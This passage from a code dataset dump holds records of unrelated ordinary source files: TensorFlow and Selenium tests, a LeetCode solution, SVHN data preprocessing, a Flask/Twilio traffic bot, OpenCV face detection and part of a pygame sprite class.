self.assertAllEqual(component[(i*19 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # Slide over a finite input, which is less than window_size,\n # should fail straight away.\n sess.run(init_op, feed_dict={count: 1, window_size: 10, stride: 4})\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n sess.run(init_op, feed_dict={count: 1, window_size: 10, stride: 8})\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # Slide over an empty input should fail straight away.\n sess.run(init_op, feed_dict={count: 0, window_size: 8, stride: 4})\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # Empty window_size should be an initialization time error.\n with self.assertRaises(errors.InvalidArgumentError):\n sess.run(init_op, feed_dict={count: 14, window_size: 0, stride: 0})\n\n # Invalid stride should be an initialization time error.\n with self.assertRaises(errors.InvalidArgumentError):\n sess.run(init_op, feed_dict={count: 14, window_size: 3, stride: 0})\n\n def assertSparseValuesEqual(self, a, b):\n self.assertAllEqual(a.indices, b.indices)\n self.assertAllEqual(a.values, b.values)\n self.assertAllEqual(a.dense_shape, b.dense_shape)\n\n def testSlideSparse(self):\n\n def _sparse(i):\n return sparse_tensor.SparseTensorValue(\n indices=[[0]], values=(i * [1]), dense_shape=[1])\n\n iterator = dataset_ops.Dataset.range(10).map(_sparse).apply(\n sliding.sliding_window_batch(5, 3)).make_initializable_iterator()\n init_op = iterator.initializer\n get_next = iterator.get_next()\n\n with self.test_session() as sess:\n sess.run(init_op)\n num_batches = (10 - 5) // 3 + 1\n for i in range(num_batches):\n actual = sess.run(get_next)\n expected = sparse_tensor.SparseTensorValue(\n indices=[[0, 0], [1, 0], [2, 0], [3, 0], [4, 0]],\n values=[i * 3, i * 3 + 1, i * 3 + 2, i * 3 + 3, i * 3 + 4],\n dense_shape=[5, 1])\n self.assertTrue(sparse_tensor.is_sparse(actual))\n self.assertSparseValuesEqual(actual, expected)\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n def testSlideSparseWithDifferentDenseShapes(self):\n\n def _sparse(i):\n return sparse_tensor.SparseTensorValue(\n indices=array_ops.expand_dims(\n math_ops.range(i, dtype=dtypes.int64), 1),\n values=array_ops.fill([math_ops.to_int32(i)], i),\n dense_shape=[i])\n\n iterator = dataset_ops.Dataset.range(10).map(_sparse).apply(\n sliding.sliding_window_batch(5, 3)).make_initializable_iterator()\n init_op = iterator.initializer\n get_next = iterator.get_next()\n\n with self.test_session() as sess:\n sess.run(init_op)\n num_batches = (10 - 5) // 3 + 1\n for i in range(num_batches):\n actual = sess.run(get_next)\n expected_indices = []\n expected_values = []\n for j in range(5):\n for k in range(i * 3 + j):\n expected_indices.append([j, k])\n expected_values.append(i * 3 + j)\n expected = sparse_tensor.SparseTensorValue(\n indices=expected_indices,\n values=expected_values,\n dense_shape=[5, i * 3 + 5 - 1])\n self.assertTrue(sparse_tensor.is_sparse(actual))\n self.assertSparseValuesEqual(actual, expected)\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n def testNestedSlideSparse(self):\n\n def _sparse(i):\n return sparse_tensor.SparseTensorValue(\n indices=[[0]], values=(i * [1]), dense_shape=[1])\n\n iterator = (dataset_ops.Dataset.range(10)\n .map(_sparse)\n .apply(sliding.sliding_window_batch(4, 2))\n .apply(sliding.sliding_window_batch(3, 1))\n .make_initializable_iterator())\n init_op = iterator.initializer\n get_next = iterator.get_next()\n\n with self.test_session() as sess:\n sess.run(init_op)\n # Slide: 1st batch.\n actual = sess.run(get_next)\n expected = sparse_tensor.SparseTensorValue(\n indices=[[0, 0, 0], [0, 1, 0], [0, 2, 0], [0, 3, 0],\n [1, 0, 0], [1, 1, 0], [1, 2, 0], [1, 3, 0],\n [2, 0, 0], [2, 1, 0], [2, 2, 0], [2, 3, 0]],\n values=[0, 1, 2, 3, 2, 3, 4, 5, 4, 5, 6, 7],\n dense_shape=[3, 4, 1])\n self.assertTrue(sparse_tensor.is_sparse(actual))\n self.assertSparseValuesEqual(actual, expected)\n # Slide: 2nd batch.\n actual = sess.run(get_next)\n expected = sparse_tensor.SparseTensorValue(\n indices=[[0, 0, 0], [0, 1, 0], [0, 2, 0], [0, 3, 0],\n [1, 0, 0], [1, 1, 0], [1, 2, 0], [1, 3, 0],\n [2, 0, 0], [2, 1, 0], [2, 2, 0], [2, 3, 0]],\n values=[2, 3, 4, 5, 4, 5, 6, 7, 6, 7, 8, 9],\n dense_shape=[3, 4, 1])\n self.assertTrue(sparse_tensor.is_sparse(actual))\n self.assertSparseValuesEqual(actual, expected)\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n def testSlideShapeError(self):\n\n def generator():\n yield [1.0, 2.0, 3.0]\n yield [4.0, 5.0, 6.0]\n yield [7.0, 8.0, 9.0, 10.0]\n\n iterator = (dataset_ops.Dataset.from_generator(generator, dtypes.float32,\n output_shapes=[None])\n .apply(sliding.sliding_window_batch(3, 1))\n .make_initializable_iterator())\n next_element = iterator.get_next()\n\n with self.test_session() as sess:\n sess.run(iterator.initializer)\n with self.assertRaisesRegexp(\n errors.InvalidArgumentError,\n r\"Cannot batch tensors with different shapes in component 0. \"\n r\"First element had shape \\[3\\] and element 2 had shape \\[4\\].\"):\n sess.run(next_element)\n\n\nif __name__ == \"__main__\":\n test.main()\n","sub_path":"tensorflow/tensorflow/contrib/data/python/kernel_tests/slide_dataset_op_test.py","file_name":"slide_dataset_op_test.py","file_ext":"py","file_size_in_byte":11153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"239037742","text":"#-*-coding:utf-8-*=\nfrom appium import webdriver\nimport unittest, time\nimport ConfigParser\nimport sys\nsys.path.append('\\public')\nfrom public import *\n\n'''\npass\nOwner: Bailu\n测试用例:Vip 申请\n测试步骤:\n'''\n\nclass Vip(unittest.TestCase):\n\n def setUp(self):\n config = ConfigParser.ConfigParser()\n config.readfp(open('info.ini'))\n self.ios = config.get('ios',\"type\")\n self.driver = ios.remotedriver(unicode(self.ios))\n self.usr = config.get('vip',\"usr\")\n self.pwd = config.get('vip',\"pwd\")\n self.nick = config.get('vip',\"nick\")\n \n def test_vip_reject(self):\n login.login(self,self.usr,self.pwd)\n self.driver.quit()\n self.driver = ios.remotedriver(unicode(self.ios))\n self.driver.implicitly_wait(30)\n setting = vip.request(self)\n self.driver.quit()\n #action: 拒绝 'reject'\n #search type: 等待处理 'wait' \n result = vip.process_request(self,self.nick,'reject','wait')\n self.driver = ios.remotedriver(unicode(self.ios))\n flag = vip.verify(self)\n self.assertEqual(setting,result)\n self.assertFalse(flag)\n \n def tearDown(self):\n self.driver.quit()\n\nif __name__==\"__main__\":\n unittest.main()","sub_path":"testcase/Case_Vip_1_request.py","file_name":"Case_Vip_1_request.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"71274063","text":"class Solution:\n# def reconstructQueue(people):\n# people.sort(key=lambda p:(p[1], p[0]))\n# recon_queue = []\n# for p in people:\n# if p[1] == 0:\n# recon_queue.append(p)\n# else:\n# index = 0\n# c = 0\n# recon_queue.append(p)\n# for r in recon_queue:\n# if c == p[1]:\n# if p[1] == recon_queue[index][1]:\n# index += 1\n# else:\n# if index == len(recon_queue) - 1:\n# break\n# else: \n# recon_queue.remove(p)\n# recon_queue.insert(index, p)\n# break\n# else:\n# index += 1\n# if r[0] >= p[0]:\n# c += 1\n# return recon_queue\n\n def reconstructQueue(people):\n people.sort(key=lambda p: (-p[0], p[1]))\n print(people)\n queue = []\n for p in people:\n queue.insert(p[1], p)\n return queue\n\ndef main():\n orig_queue1 = [[4,2], [2,3], [7,0], [6,1], [7,2], [9,0], [1,4], [8,0], [6,5], [5,6]]\n orig_queue2 = [[7,0],[4,4],[7,1],[5,0],[6,1],[5,2]] \n orig_queue3 = [[3,0], [6,0], [9,0], [6,2], [13,0], [10,1], [10,2], [11,1], [12,1], [12,2]]\n recon_queue = Solution.reconstructQueue(orig_queue1)\n print(recon_queue)\n\nmain()\n\n","sub_path":"Queue Reconstruction by Height.py","file_name":"Queue Reconstruction by Height.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"467848817","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\n\nimport numpy as np\nimport h5py\n\nfrom pathlib import Path\nfrom scipy import io\nfrom tensorflow import keras\nfrom PIL import Image\n\nfrom utils import to_one_hot\n\n\ndef load_mnist():\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n\n def to_x(a):\n x = np.array([np.array(Image.fromarray(i).resize((32, 32))) for i in a])\n return x.reshape(x.shape + (1,))\n\n def to_y(a):\n return to_one_hot(a, 10)\n\n x_train, y_train = to_x(x_train), to_y(y_train)\n x_test, y_test = to_x(x_test), to_y(y_test)\n print('Loaded and processed mnist dataset')\n return x_train, y_train, x_test, y_test\n\n\ndef load_single_digit_data(dir='data/svhn', extra=False, greyscale=True):\n\n def to_x(a):\n a = np.array([a[:,:,:,i] for i in range(a.shape[3])])\n if greyscale:\n return np.mean(a, axis=-1, keepdims=True).astype(np.uint8)\n return a\n\n def to_y(a):\n y = np.copy(a)\n y = y.reshape(y.shape[0])\n y[y == 10] = 0\n return to_one_hot(y, 10)\n\n def load_file(file):\n cache_file = Path(dir) / f\"{file}.cache.npz\"\n if cache_file.exists():\n f = np.load(cache_file)\n print(f'Loaded cached arrays for {file}')\n return [v for k, v in f.items()]\n\n f = io.loadmat(Path(dir) / file)\n x, y = to_x(f['X']), to_y(f['y'])\n np.savez(Path(dir) / f\"{file}.cache.npz\", x, y)\n print(f'Loaded and processed {file}')\n return x, y\n\n x_train, y_train = load_file('train_32x32.mat')\n x_test, y_test = load_file('test_32x32.mat')\n\n x_extra, y_extra = None, None\n if extra:\n x_extra, y_extra = load_file('extra_32x32.mat')\n\n return (\n x_train, y_train,\n x_test, y_test,\n x_extra, y_extra\n )\n\n\ndef load_multiple_digits_data(dir='data/svhn', train=True, extra=False):\n\n def parse_digit_struct(file):\n if Path(f\"{file}.cache.json\").exists():\n with open(f\"{file}.cache.json\", \"r\") as f:\n images = json.load(f)\n print(f'Loaded cached image attrs from {file}.cache.json')\n return images\n\n f = h5py.File(file, 'r')\n print(f'Opened file {file}')\n\n names = f['digitStruct']['name']\n bbox = f['digitStruct']['bbox']\n\n def extract_name(i):\n return ''.join([chr(c[0]) for c in f[names[i][0]].value])\n\n def extract_attr(i, attr):\n attr = f[bbox[i].item()][attr]\n if len(attr) > 1:\n return [f[attr.value[j].item()].value[0][0] for j in range(len(attr))]\n else:\n return [attr.value[0][0]]\n\n images = {}\n print(f'Extracting image attrs from {file}: ', end='')\n for i in range(len(names)):\n name = extract_name(i)\n images[name] = {\n \"label\": extract_attr(i, 'label'),\n \"top\": extract_attr(i, 'top'),\n \"left\": extract_attr(i, 'left'),\n \"height\": extract_attr(i, 'height'),\n \"width\": extract_attr(i, 'width')\n }\n if i % 1000 == 0:\n print('.', end='', flush=True)\n print()\n\n with open(f\"{file}.cache.json\", 'w+') as f:\n json.dump(images, f)\n return images\n\n def process_images(dir):\n cache_file = Path(dir) / 'cache.npz'\n if cache_file.exists():\n f = np.load(cache_file)\n print(f'Loaded cached arrays for {dir}')\n return [v for k, v in f.items()]\n\n attrs = parse_digit_struct(Path(dir) / 'digitStruct.mat')\n\n x, y = [], []\n print(f'Processing images from {dir}: ', end='', flush=True)\n for i, name in enumerate(os.listdir(dir)):\n if name not in attrs:\n print('s', end='', flush=True)\n continue\n\n img = Image.open(Path(dir) / name)\n\n height = int(max(attrs[name]['height']))\n width = int(max(attrs[name]['width']))\n left = max(int(min(attrs[name]['left'])) - 0.5 * width, 0)\n top = max(int(min(attrs[name]['top'])) - 0.5 * height, 0)\n right = min(int(max(attrs[name]['left'])) + 1.5 * width, img.size[0])\n bottom = min(int(max(attrs[name]['top'])) + 1.5 * height, img.size[1])\n\n img = img.crop(box=(left, top, right, bottom))\n img = img.resize((96, 96))\n\n label = [d % 10 for d in attrs[name]['label']]\n if len(label) > 6:\n print('e', end='', flush=True)\n continue\n\n label += [10] * (6 - len(label))\n label = to_one_hot(np.array(label, dtype=np.int), 11)\n\n x.append(np.array(img))\n y.append(np.array(label))\n\n if i % 1000 == 0:\n print('.', end='', flush=True)\n print()\n\n x = np.array(x, dtype=np.uint8)\n y = np.array(y, dtype=np.uint8)\n np.savez(Path(dir) / \"cache.npz\", x, y)\n return x, y\n\n x_test, y_test = process_images(Path(dir) / 'test/')\n\n x_train, y_train = None, None\n if train:\n x_train, y_train = process_images(Path(dir) / 'train/')\n\n x_extra, y_extra = None, None\n if extra:\n x_extra, y_extra = process_images(Path(dir) / 'extra/')\n\n return (\n x_train, y_train,\n x_test, y_test,\n x_extra, y_extra\n )\n\n\nif __name__ == '__main__':\n load_multiple_digits_data()\n","sub_path":"2/svhn_preprocess.py","file_name":"svhn_preprocess.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"371834898","text":"from app import app\nfrom flask import render_template, request\nfrom twilio.twiml.messaging_response import MessagingResponse\nimport folium\nimport requests\n\n\ndef get_traffic_data(lat, lon):\n params = {'point': f'{lat},{lon}', 'unit': 'mph', 'thickness': 14, 'key': app.config['TOMTOM_API_KEY']}\n base_url = 'https://api.tomtom.com/traffic/services/4/flowSegmentData/absolute/10/json'\n data = requests.get(base_url, params=params).json()\n return data\n\n\ndef create_reply(lat, lon):\n data = get_traffic_data(lat, lon)\n\n road_types = {'FRC0': 'Motorway',\n 'FRC1': 'Major road',\n 'FRC2': 'Other major road',\n 'FRC3': 'Secondary road',\n 'FRC4': 'Local connecting road',\n 'FRC5': 'Local road of high importance',\n 'FRC6': 'Local road'\n }\n\n if data['flowSegmentData']['roadClosure']:\n reply = 'Unfortunately this road is closed!'\n\n else:\n reply = (f\"Your nearest road is classified as a _{road_types[data['flowSegmentData']['frc']]}_. \"\n f\"The current average speed is *{data['flowSegmentData']['currentSpeed']} mph* and \"\n f\"would take *{data['flowSegmentData']['currentTravelTime']} seconds* to pass this section of road. \"\n f\"With no traffic, the speed would be *{data['flowSegmentData']['freeFlowSpeed']} mph* and would \"\n f\"take *{data['flowSegmentData']['freeFlowTravelTime']} seconds*.\")\n\n return reply\n\n\n@app.route('/map')\ndef create_map():\n lat = request.args.get('lat')\n lon = request.args.get('lon')\n\n data = get_traffic_data(lat, lon)\n\n points = [(i['latitude'], i['longitude']) for i in data['flowSegmentData']['coordinates']['coordinate']]\n\n m = folium.Map(location=(lat, lon), zoom_start=15)\n folium.PolyLine(points, color='green', weight=10).add_to(m)\n\n return m._repr_html_()\n\n\n@app.route('/bot', methods=['POST'])\ndef bot():\n resp = MessagingResponse()\n msg = resp.message()\n\n if 'Latitude' in request.values.keys() and 'Longitude' in request.values.keys():\n lat = request.values.get('Latitude')\n lon = request.values.get('Longitude')\n\n reply = create_reply(lat, lon)\n url = f'{request.url_root}map?lat={lat}&lon={lon}'\n msg.body(f'{reply}\\n\\nCheck out the interactive map here:\\n{url}')\n\n else:\n msg.body('Hello! This is the Twilio Traffic Bot. Please share your location to get a live traffic report.')\n\n return str(resp)\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html', title='Home')\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"370443957","text":"from numpy import *\nfrom numpy.linalg import *\nm=array(eval(input(\"Matriz: \")))\nl=shape(m)[0]\nz=zeros(l, dtype=int)\nfor i in range(l):\n\tfor j in range(7):\n\t\tz[i]=z[i]+m[i,j]\nprint(z)\n\n","sub_path":"5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4059/codes/1846_1275.py","file_name":"1846_1275.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"54865576","text":"'''\nanalyse house info module\n'''\n\nimport csv\nimport sys\nimport queue\nimport os\nimport concurrent.futures\nimport time\nfrom bs4 import BeautifulSoup\nfrom super_thread import thread_pool\n\nclass Analyse(thread_pool.Task):\n '''\n analyse house informations from the website.\n '''\n \n def __init__(self,config,log):\n thread_pool.Task.__init__(self,'analyse_task')\n self.log=log\n self.house_file_name=[]\n self.house_detail_info_queue=queue.Queue()\n self.config=config\n self.exe_path=self.config.get('file','exe_path')\n self.root_file_dir=self.config.get('dir','root_file_dir')\n self.houe_file_root=self.root_file_dir+self.config.get('dir','house_file_dir')\n self.house_files={} #{regin:[house1,house2]}\n self.house_files_queue=queue.Queue()\n self.house_file_page_queue=queue.Queue()\n\n self.house_info_queue=queue.Queue()\n\n self.house_detail_info_list=[]\n\n self.house_detail_dict={}\n\n self.file_level=0\n self.stop=False\n \n def run(self):\n while not self.stop :\n start=time.time()\n retry=self.retry\n self.clear()\n self.log.info('get_house_file start......')\n\n #self.analyse.get_house_file()\n self.load_house_file()\n self.log.info('get_house_file finished.....')\n self.log.info('construct_house_infos start......')\n\n self.construct_house_infos()\n self.log.info('construct_house_infos finished......')\n self.log.info('extract_house_detail start......')\n\n self.extract_house_detail()\n self.log.info('extract_house_detail finished......')\n self.log.info('reduce start......')\n\n self.reduce()\n self.log.info('reduce finished......')\n self.log.info('ReportForm start......')\n\n\n end=time.time()\n total_time=end-start\n self.log.info(total_time)\n time.sleep(self.request_time_interval)\n\n def clear(self):\n self.house_detail_info_queue=queue.Queue()\n self.house_files={} #{regin:[house1,house2]}\n self.house_files_queue=queue.Queue()\n self.house_file_page_queue=queue.Queue()\n\n self.house_info_queue=queue.Queue()\n\n def load_house_file(self):\n file_name=self.houe_file_root+'/update_url.csv'\n print(file_name)\n with open(file_name) as f:\n csv_file=csv.reader(f)\n for row in csv_file:\n if row[1] in self.house_files:\n self.house_files[row[1]].append(row[0])\n else:\n data=[]\n data.append(row[0])\n self.house_files[row[1]]=data\n\n\n def get_house_file(self,level=0,data='',path=''):\n if len(path)==0:\n path=self.houe_file_root\n dir_or_files = os.listdir(path)\n for dir_file in dir_or_files:\n dir_file_path = os.path.join(path,dir_file)\n if os.path.isdir(dir_file_path):\n if level==0:\n data=dir_file\n if dir_file=='url_detail_page':\n self.house_files[data]=[]\n \n file_level=level+1\n self.get_house_file(file_level,data,dir_file_path)\n \n else:\n if dir_file_path.find('.html')!=-1:\n if len(data)>0:\n if data in self.house_files:\n file_list=self.house_files[data]\n file_list.append(dir_file_path)\n print(dir_file_path)\n \n def __get_house_page__(self,id):\n '''\n extract all href of house page and save it to house_detail_info_url\n '''\n \n i=0\n while True:\n data=self.house_files_queue.get(block=False)\n i=i+1\n self.house_files_queue.task_done()\n \n try:\n page=self.__read_file__(data.house_file)\n data.house_page=page\n self.house_file_page_queue.put(data)\n except:\n print('__get_house_page__ unknown except')\n return False\n if self.house_files_queue.empty():\n break;\n\n self.log.debug('get house page thread{}: executor {} task done'.format(id,i))\n return True\n\n def __read_file__(self,file_name):\n with open(file_name, 'r') as f:\n page=f.read()\n return page\n \n \n def construct_house_infos(self): \n start=time.time()\n\n for (key, value) in self.house_files.items():\n for val in value:\n house_data=HouseData()\n house_data.region=key\n house_data.house_file=val\n print(house_data.to_string())\n self.house_files_queue.put(house_data)\n \n thread_num=int(self.config.get('thread','get_house_detail_page_thread_num'))\n num=self.house_files_queue.qsize()\n if num==0:\n return\n if num0:\n houseids=names[len(names)-1].split('.')\n\n house_info=HouseInfo()\n house_info.region=data.region\n if len(houseids)>1:\n house_info.house_id=houseids[0]\n house_detail=house_info.house_detail\n \n soup=BeautifulSoup(page,'lxml')\n for di in soup.find(class_=\"transaction\").children:\n if di.name=='div':\n if di['class'][0]=='content':\n for ul in di.children:\n if ul.name=='ul':\n for span in ul.children:\n if span.name=='li':\n for d in span.children:\n if d.name=='span':\n if d.string!='挂牌时间':\n house_info.publish_time=d.string\n break \n \n for di in soup.find(class_=\"sellDetailHeader\").children:\n if di.name=='div':\n for ul in di.children:\n if ul.name=='div':\n for ul2 in ul.children:\n if ul2.name=='div':\n for ul3 in ul2.children:\n if ul3.name=='div':\n for ul4 in ul3.children:\n if ul4.name=='div':\n if ul4['class'][0]=='action':\n for ul5 in ul4.children:\n if ul5.name=='span':\n if ul5['class'][0]=='count':\n house_info.focus_num=ul5.string\n \n break\n \n \n for div in soup.find(class_=\"overview\").children:\n if div['class'][0]=='content':\n for item in div.children:\n \n if item['class'][0]=='price':\n for span in item.children:\n if span['class'][0]=='total':\n house_detail.total_price=span.string\n if span['class'][0]=='text':\n for div in span.children:\n if div['class'][0]=='unitPrice':\n for span in div.children:\n if span['class'][0]=='unitPriceValue':\n for str in span.strings:\n house_detail.average_price=str\n break;\n if item['class'][0]=='aroundInfo':\n for div in item.children:\n if div['class'][0]=='communityName':\n \n for di in div.children:\n if di.name=='a':\n if di['class'][0]=='info':\n house_info.neighborhodd_name=di.string\n \n if item['class'][0]=='houseInfo':\n for div in item.children:\n if div['class'][0]=='area':\n for div2 in div.children:\n if div2['class'][0]=='mainInfo':\n house_detail.area=div2.string\n if div['class'][0]=='room':\n for div2 in div.children:\n if div2['class'][0]=='mainInfo':\n house_detail.layout=div2.string\n if div['class'][0]=='type':\n for div2 in div.children:\n if div2['class'][0]=='subInfo':\n house_detail.dress=div2.string \n if div2['class'][0]=='mainInfo':\n house_detail.tongtou=div2.string \n self.house_info_queue.put(house_info)\n if house_info.neighborhodd_name in house_detail_dict:\n house_detail_dict[house_info.neighborhodd_name].append(house_info)\n else:\n house_info_list=[]\n house_info_list.append(house_info)\n house_detail_dict[house_info.neighborhodd_name]=house_info_list\n print(house_info.to_string())\n\n \n #print(house_info.to_string())\n\n if self.house_file_page_queue.empty():\n break;\n\n self.log.debug('extract house detail thread{}:executor {} task'.format(id,i))\n return house_detail_dict\n \n def extract_house_detail(self):\n start=time.time()\n thread_num=int(self.config.get('thread','extract_house_detail_thread_num'))\n num=self.house_file_page_queue.qsize()\n if num==0:\n return\n if num Argparse: global arguments\"\"\"\r\n t_train = SegTransformCompose(RandomCrop(args.crop), Resize(size=args.size), HFlip(0.5),\r\n AdjustBrightness(0.5), AdjustContrast(0.5),\r\n AdjustSaturation(0.5), ToTensor(),\r\n Normalize(mean=args.mean, std=args.std)\r\n )\r\n\r\n t_eval = SegTransformCompose(Resize(size=args.size),\r\n ToTensor(),\r\n Normalize(mean=args.mean, std=args.std)\r\n )\r\n\r\n if args.data == \"CamVid\":\r\n train_set = CamVid(args.dset_folder, split=\"train\", transforms=t_train)\r\n val_set = CamVid(args.dset_folder, split=\"val\", transforms=t_eval)\r\n test_set = CamVid(args.dset_folder, split=\"test_ood\", transforms=t_eval)\r\n\r\n elif args.data == \"StreetHazard\":\r\n train_set = StreetHazard(args.dset_folder, split=\"train\", transforms=t_train)\r\n val_set = StreetHazard(args.dset_folder, split=\"validation\", transforms=t_eval)\r\n test_set = StreetHazard(args.dset_folder, split=\"test\", transforms=t_eval)\r\n\r\n elif args.data == \"BddAnomaly\":\r\n train_set = BddAnomaly(args.dset_folder, split=\"train\", transforms=t_train)\r\n val_set = BddAnomaly(args.dset_folder, split=\"validation\", transforms=t_eval)\r\n test_set = BddAnomaly(args.dset_folder, split=\"test\", transforms=t_eval)\r\n\r\n else:\r\n raise NameError('Unknown dataset')\r\n\r\n train_loader = DataLoader(train_set, batch_size=args.bsize, num_workers=args.num_workers,\r\n pin_memory=True, drop_last=True, shuffle=True)\r\n\r\n val_loader = DataLoader(val_set, batch_size=args.bsize, num_workers=args.num_workers,\r\n pin_memory=True, drop_last=True, shuffle=True)\r\n\r\n test_loader = DataLoader(test_set, batch_size=1, num_workers=args.num_workers,\r\n pin_memory=True)\r\n\r\n return train_loader, val_loader, test_loader\r\n","sub_path":"Datasets/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"52704049","text":"import unittest\nfrom selenium import webdriver\nimport orders_po\nfrom input_parameters import *\nimport sys\nsys.path.append(\"tests\")\n\n\nclass BuySomething(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.parameters = TestShopParameters\n self.base_url = self.parameters.BASE_URL\n\n def test_new_order(self):\n driver = self.driver\n driver.get(self.base_url)\n\n newOrder = orders_po.Order(driver)\n newOrder.shopTShorts()\n newOrder.chooseParticular()\n newOrder.addToCart()\n newOrder.proceedToCheckout()\n newOrder.enterAccount(self.parameters.ORDER_EMAIL, self.parameters.ORDER_PASSWORD)\n newOrder.loginInto()\n newOrder.chooseAddress()\n newOrder.shippingMethod()\n newOrder.paymentMethod()\n newOrder.sendOrder()\n newOrder.checkOrderStatus(self.parameters.ORDER_MESSAGE)\n\n def tearDown(self):\n self.driver.quit()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test_place_order.py","file_name":"test_place_order.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"298715080","text":"import cv2 as cv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\n\ndef show1(imagen):\n plt.imshow(imagen, cmap=\"gray\")\n plt.axis(\"off\")\n plt.show()\n\n\ndef show2(image1, image2):\n plt.figure(1, figsize=(15, 20))\n plt.subplot(211)\n plt.imshow(image1, cmap=\"gray\")\n plt.axis(\"off\")\n\n plt.subplot(212)\n plt.imshow(image2, cmap=\"gray\")\n plt.axis(\"off\")\n plt.show()\n\n\n# photo = cv.imread('letras.jpg')\n# # show1(photo)\n#\n# photo_gris = cv.cvtColor(photo, cv.COLOR_BGR2GRAY)\n# # show2(photo_gris, photo)\ncascade_path = 'haarcascade_frontalface_default.xml'\nclassifier = cv.CascadeClassifier(cascade_path)\n# faces_detected = classifier.detectMultiScale(photo_gris,\n# scaleFactor=1.163145,\n# minNeighbors=1,\n# flags=cv.CASCADE_SCALE_IMAGE,\n# minSize=(60, 60),\n# maxSize=(100, 100))\n#\n#\n# for(x, y, l, a) in faces_detected:\n# photo = cv.rectangle(photo, (x, y), (x+l, y+a), (212, 172, 13), 2)\n# region_gaussian = cv.GaussianBlur(photo[y:y+l, x:x+a], (11, 11), 13)\n# photo[y:y + l, x:x + a] = region_gaussian\n#\n#\n# show1(photo)\n# region_mean = cv.medianBlur(photo[y:y+l, x:x+a], 15)\n# photo[y:y + l, x:x + a] = region_mean\n\n# photo2_gray = cv.cvtColor(photo, cv.COLOR_BGR2GRAY)\n# faces_detected2 = classifier.detectMultiScale(photo2_gray, scaleFactor=1.163145, minNeighbors=1, minSize=(60, 60),\n# maxSize=(100, 100))\n#\n# for(x, y, l, a) in faces_detected:\n# photo = cv.rectangle(photo, (x, y), (x+l, y+a), (212, 172, 13), 2)\n# # region_gaussian = cv.GaussianBlur(photo[y:y+l, x:x+a], (23, 23), 13)\n# # photo[y:y + l, x:x + a] = region_gaussian\n#\n# show1(photo)\n# time.sleep(2)\n\n# Second part\nphoto2 = cv.imread('letras.jpg')\nphoto2_gray = cv.cvtColor(photo2, cv.COLOR_BGR2GRAY)\nfaces_detected2 = classifier.detectMultiScale(photo2_gray,\n scaleFactor=1.163145,\n minNeighbors=1,\n minSize=(60, 60),\n maxSize=(100, 100))\n\n\ndef rotate_image(image, angle):\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\n rot_mat = cv.getRotationMatrix2D(image_center, angle, 1.0)\n result = cv.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv.INTER_LINEAR)\n return result\n\n\nfor(x, y, l, a) in faces_detected2:\n photo2 = cv.rectangle(photo2, (x, y), (x+l, y+a), (212, 172, 13), 2)\n region = photo2[y:y+l, x:x+a]\n region = rotate_image(region, 180)\n time.sleep(2)\n photo2[y:y + l, x:x + a] = region\n\nshow1(photo2)\n","sub_path":"src/w3_detectface.py","file_name":"w3_detectface.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"627948824","text":"import pygame\nimport math\nfrom random import random, choice\n\n\n# Классы игровых объектов\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n # начальное положение игрока\n self.speed = 120 # скорость пискелей в секунду\n\n self.image = pygame.image.load('Sprites/forward/forward7.PNG')\n self.image.set_colorkey((255, 255, 255))\n self.load_images()\n self.last_anim = 0\n\n self.rect = self.image.get_rect()\n self.rect.center = (640, 860)\n self.lastRect_x = self.rect.x\n self.lastRect_y = self.rect.y\n\n self.lastKey = ''\n\n self.hp = 20 # хп танка (уничтожение от 4 попаданий, урон снарядом противника - 5 хп)\n self.sp = self.speed // 60\n\n def load_images(self):\n self.player_anim_forward = []\n for i in range(1, 9):\n self.player_anim_forward.append(pygame.image.load('Sprites/forward/forward{id}.png'.format(id=str(i))))\n self.player_anim_forward.reverse()\n\n self.player_anim_back = []\n for i in range(1, 9):\n self.player_anim_back.append(pygame.image.load('Sprites/back/back{id}.png'.format(id=str(i))))\n\n self.player_anim_left = []\n for i in range(1, 9):\n self.player_anim_left.append(pygame.image.load('Sprites/left/left{id}.png'.format(id=str(i))))\n self.player_anim_left.reverse()\n\n self.player_anim_right = []\n for i in range(1, 9):\n self.player_anim_right.append(pygame.image.load('Sprites/right/right{id}.png'.format(id=str(i))))\n 